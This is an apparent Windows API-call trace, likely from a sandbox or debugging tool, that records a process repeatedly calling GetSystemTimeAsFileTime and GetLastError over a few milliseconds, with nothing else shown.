[0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.895] GetLastError () returned 0x0 [0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.895] GetLastError () returned 0x0 [0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.895] GetLastError () returned 0x0 [0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.895] GetLastError () returned 0x0 [0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.895] GetLastError () returned 0x0 [0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.895] GetLastError () returned 0x0 [0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.895] GetLastError () returned 0x0 [0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.895] GetLastError () returned 0x0 [0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.895] GetLastError () returned 0x0 [0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.895] GetLastError () returned 0x0 [0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.895] GetLastError () returned 0x0 [0201.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.896] GetLastError () returned 0x0 [0201.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.896] GetLastError () returned 0x0 [0201.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.896] GetLastError () returned 0x0 [0201.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.896] GetLastError () returned 0x0 [0201.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.896] GetLastError () returned 0x0 [0201.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.896] GetLastError () returned 0x0 [0201.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.896] GetLastError () returned 0x0 [0201.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.896] GetLastError () returned 0x0 [0201.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.896] GetLastError () returned 0x0 [0201.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.896] GetLastError () returned 0x0 [0201.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.896] GetLastError () returned 0x0 [0201.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.896] GetLastError () returned 0x0 [0201.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.896] GetLastError () returned 0x0 [0201.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.897] GetLastError () returned 0x0 [0201.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.897] GetLastError () returned 0x0 [0201.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.897] GetLastError () returned 0x0 [0201.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.897] GetLastError () returned 0x0 [0201.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.897] GetLastError () returned 0x0 [0201.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.897] GetLastError () returned 0x0 [0201.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.897] GetLastError () returned 0x0 [0201.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.897] GetLastError () returned 0x0 [0201.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.897] GetLastError () returned 0x0 [0201.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.897] GetLastError () returned 0x0 [0201.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.897] GetLastError () returned 0x0 [0201.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.897] GetLastError () returned 0x0 [0201.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.898] GetLastError () returned 0x0 [0201.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.898] GetLastError () returned 0x0 [0201.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.898] GetLastError () returned 0x0 [0201.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.898] GetLastError () returned 0x0 [0201.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.898] GetLastError () returned 0x0 [0201.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.898] GetLastError () returned 0x0 [0201.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.898] GetLastError () returned 0x0 [0201.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.898] GetLastError () returned 0x0 [0201.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.898] GetLastError () returned 0x0 [0201.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.898] GetLastError () returned 0x0 [0201.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.898] GetLastError () returned 0x0 [0201.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.898] GetLastError () returned 0x0 [0201.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.898] GetLastError () returned 0x0 [0201.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.899] GetLastError () returned 0x0 [0201.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.899] GetLastError () returned 0x0 [0201.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.899] GetLastError () returned 0x0 [0201.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.899] GetLastError () returned 0x0 [0201.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.899] GetLastError () returned 0x0 [0201.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.899] GetLastError () returned 0x0 [0201.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.899] GetLastError () returned 0x0 [0201.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.899] GetLastError () returned 0x0 [0201.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.899] GetLastError () returned 0x0 [0201.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.899] GetLastError () returned 0x0 [0201.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.899] GetLastError () returned 0x0 [0201.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.899] GetLastError () returned 0x0 [0201.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.900] GetLastError () returned 0x0 [0201.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.900] GetLastError () returned 0x0 [0201.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.900] GetLastError () returned 0x0 [0201.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.900] GetLastError () returned 0x0 [0201.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.900] GetLastError () returned 0x0 [0201.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.900] GetLastError () returned 0x0 [0201.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.900] GetLastError () returned 0x0 [0201.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.900] GetLastError () returned 0x0 [0201.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.900] GetLastError () returned 0x0 [0201.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.900] GetLastError () returned 0x0 [0201.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.900] GetLastError () returned 0x0 [0201.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.900] GetLastError () returned 0x0 [0201.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.901] GetLastError () returned 0x0 [0201.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.901] GetLastError () returned 0x0 [0201.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.901] GetLastError () returned 0x0 [0201.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.901] GetLastError () returned 0x0 [0201.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.901] GetLastError () returned 0x0 [0201.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.901] GetLastError () returned 0x0 [0201.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.901] GetLastError () returned 0x0 [0201.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.901] GetLastError () returned 0x0 [0201.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.901] GetLastError () returned 0x0 [0201.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.901] GetLastError () returned 0x0 [0201.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.901] GetLastError () returned 0x0 [0201.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.901] GetLastError () returned 0x0 [0201.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.902] GetLastError () returned 0x0 [0201.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.902] GetLastError () returned 0x0 [0201.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.902] GetLastError () returned 0x0 [0201.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.902] GetLastError () returned 0x0 [0201.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.902] GetLastError () returned 0x0 [0201.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.902] GetLastError () returned 0x0 [0201.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.902] GetLastError () returned 0x0 [0201.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.902] GetLastError () returned 0x0 [0201.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.902] GetLastError () returned 0x0 [0201.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.902] GetLastError () returned 0x0 [0201.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.902] GetLastError () returned 0x0 [0201.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.902] GetLastError () returned 0x0 [0201.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.903] GetLastError () returned 0x0 [0201.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.903] GetLastError () returned 0x0 [0201.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.903] GetLastError () returned 0x0 [0201.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.903] GetLastError () returned 0x0 [0201.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.903] GetLastError () returned 0x0 [0201.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.903] GetLastError () returned 0x0 [0201.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.903] GetLastError () returned 0x0 [0201.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.903] GetLastError () returned 0x0 [0201.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.903] GetLastError () returned 0x0 [0201.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.903] GetLastError () returned 0x0 [0201.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.903] GetLastError () returned 0x0 [0201.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.903] GetLastError () returned 0x0 [0201.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.904] 